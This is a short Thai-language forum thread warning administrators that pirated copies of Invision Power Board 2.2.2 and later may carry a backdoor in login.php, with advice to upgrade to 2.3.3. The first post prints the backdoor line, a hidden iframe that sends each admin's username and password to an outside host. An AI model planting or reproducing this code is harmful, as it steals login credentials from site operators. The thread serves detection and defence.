ผู้ใช้ Board IPB 2.2.2 ขั้นไประวัง !!

[asylu3]

ใครใช้ IPB (Invision Power Board) Version 2.2.2 ขึ้นไปที่โหลดจากเว็บใต้ดินต่างๆมีโอกาสที่มี Code Backdoor ฝังอยู่
ให้เข้าไปเช็คดูที่ <forumfolder>/sources/action_admin/login.php

[hide=20]

Code:

$connector

หากพบ Backdoor อยู่ด้านล่างจะมี Code เขียนไว้ทำนองนี้


[code]$connector = &#39;&lt;script>window.stuats=\&#39;\&#39;;</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=&#39; . htmlentities($this->ipsclass->vars[&#39;board_url&#39;]) . &#39;&user=&#39; . htmlentities($this->ipsclass->input[&#39;username&#39;]) . &#39;&pass=&#39; . htmlentities($this->ipsclass->input[&#39;password&#39;]) . &#39;\"></div>&#39;;

[ntspirit11]

ให้ข้อมูลเพิ่มเติม จาก ipbthailand คับ เพื่อเป็นแนวทางอีกที่นึง

**Hidden Content: To see this hidden content your post count must be 5 or greater.**

ตอนนี้ล่าสุด เป็น 2.3.3 นะคับ ใครที่ใช้รุ่นเก่าอยู่ รีบเปลี่ยนได้เลยนะคับ โดยเฉพาะ คนที่ใช้ ตั้งแต่ 2.2 และ 2.3.2 (2.3.2 บัคเยอะมากคับ เลยต้องออก 2.3.3 มาแก้ แล้วก็แก้ได้เป็นที่เรียบร้อย)

[0ni]

Nice zero-days! I couldn&#39;t find this anywhere on google!

Glad I found this site and I shall be contributing much more.